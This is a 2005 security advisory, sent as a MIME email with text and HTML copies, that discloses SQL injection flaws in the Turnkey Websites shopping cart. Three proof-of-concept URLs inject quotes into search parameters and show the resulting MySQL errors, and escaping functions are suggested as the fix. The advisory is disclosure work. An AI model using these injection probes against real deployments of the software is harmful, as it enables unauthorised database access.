turnkeyShopping.txt

`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0005_01C537E8.69C2ED90  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Severity: High  
Title: Multiple SQL injection vulnerabilities in Turnkey Websites: =  
SHOPPING CART  
Date: 03/04/2005  
  
Vendor: Turnkey Websites  
Vendor Website: http://www.turnkeywebsites.info/  
Summary: There are, multiple sql injection vulnerabilities in turnkey =  
websites: shopping cart.  
  
Proof of Concept Exploits:=20  
  
http://localhost/SearchResults.php?SearchTerm=3D'SQL_INJECTION&where=3D'S=  
QL_INJECTION&ord1=3DItemPrice&ord2=3Ddesc  
SQL INJECTION  
You have an error in your SQL syntax. Check the manual that corresponds =  
to your MySQL server version for the right syntax to use near =  
'\'SQL_INJECTION like '%\'SQL_INJECTION%' order by Ite  
  
  
http://localhost/SearchResults.php?SearchTerm=3Ddcrab&where=3D'SQL_INJECT=  
ION&ord1=3D&ord2=3Ddesc  
SQL INJECTION  
You have an error in your SQL syntax. Check the manual that corresponds =  
to your MySQL server version for the right syntax to use near =  
'\'SQL_INJECTION like '%dcrab%' order by desc limit 0  
  
  
http://localhost/SearchResults.php?SearchTerm=3Ddcrab&where=3DItemDescrip=  
tion&ord1=3DItemPrice&ord2=3D'SQL_INJECTION  
SQL INJECTION  
You have an error in your SQL syntax. Check the manual that corresponds =  
to your MySQL server version for the right syntax to use near '\'SQL =  
INJECTION limit 0, 5' at line 7  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/. Look outfor =  
my soon to come out book on Secure coding with php.  
  
Diabolic Crab's Security Services: Contact at =  
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web =  
application securing services, along with programming in php, vb, asp, =  
c, c++, perl, java, html and graphic designing.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQk7wkSZV5e8av/DUEQJHMwCglMZY7yi5wKzYRXO+YxxpBQN8+lwAnimE  
QhGm25bVs6szjFhP7UFIxz19  
=3DjKuM  
-----END PGP SIGNATURE-----  
  
  
------=_NextPart_000_0005_01C537E8.69C2ED90  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =  
MESSAGE-----<BR>Hash:=20  
SHA1</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =  
Security Group]=20  
<A =  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
BR>[dP=20  
Security] <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=  
</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Multiple SQL =  
injection=20  
vulnerabilities in Turnkey Websites: SHOPPING CART<BR>Date:=20  
03/04/2005</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: Turnkey Websites<BR>Vendor =  
Website: <A=20  
href=3D"http://www.turnkeywebsites.info/">http://www.turnkeywebsites.info=  
/</A><BR>Summary:=20  
There are, multiple sql injection vulnerabilities in turnkey websites: =  
shopping=20  
cart.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2><A=20  
href=3D"http://localhost/SearchResults.php?SearchTerm=3D'SQL_INJECTION&am=  
p;where=3D'SQL_INJECTION&ord1=3DItemPrice&ord2=3Ddesc">http://loc=  
alhost/SearchResults.php?SearchTerm=3D'SQL_INJECTION&where=3D'SQL_INJ=  
ECTION&ord1=3DItemPrice&ord2=3Ddesc</A><BR>SQL=20  
INJECTION<BR>You have an error in your SQL syntax. Check the manual that =  
  
corresponds to your MySQL server version for the right syntax to use =  
near=20  
'\'SQL_INJECTION like '%\'SQL_INJECTION%' order by Ite</FONT></DIV>  
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>  
<DIV><BR><A=20  
href=3D"http://localhost/SearchResults.php?SearchTerm=3Ddcrab&where=3D=  
'SQL_INJECTION&ord1=3D&ord2=3Ddesc">http://localhost/SearchResult=  
s.php?SearchTerm=3Ddcrab&where=3D'SQL_INJECTION&ord1=3D&ord2=3D=  
desc</A><BR>SQL=20  
INJECTION<BR>You have an error in your SQL syntax. Check the manual that =  
  
corresponds to your MySQL server version for the right syntax to use =  
near=20  
'\'SQL_INJECTION like '%dcrab%' order by desc limit 0</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/SearchResults.php?SearchTerm=3Ddcrab&where=3D=  
ItemDescription&ord1=3DItemPrice&ord2=3D'SQL_INJECTION">http://lo=  
calhost/SearchResults.php?SearchTerm=3Ddcrab&where=3DItemDescription&=  
amp;ord1=3DItemPrice&ord2=3D'SQL_INJECTION</A><BR>SQL=20  
INJECTION<BR>You have an error in your SQL syntax. Check the manual that =  
  
corresponds to your MySQL server version for the right syntax to use =  
near '\'SQL=20  
INJECTION limit 0, 5' at line 7</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20  
mysql_escape_string(), mysql_real_escape_string() and other functions =  
for input=20  
validation before passing user input to the mysql database, or before =  
echoing=20  
data on the screen, would solve these problems.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Author: <BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. Look =  
outfor my=20  
soon to come out book on Secure coding with php.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Diabolic Crab's Security Services: Contact at=20  
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20  
application securing services, along with programming in php, vb, asp, =  
c, c++,=20  
perl, java, html and graphic designing.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =  
for=20  
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>iQA/AwUBQk7wkSZV5e8av/DUEQJHMwCglMZY7yi5wKzYRXO+YxxpBQN8+lwAnimE<BR>=  
QhGm25bVs6szjFhP7UFIxz19<BR>=3DjKuM<BR>-----END=20  
PGP SIGNATURE-----<BR></FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>  
  
------=_NextPart_000_0005_01C537E8.69C2ED90--  
`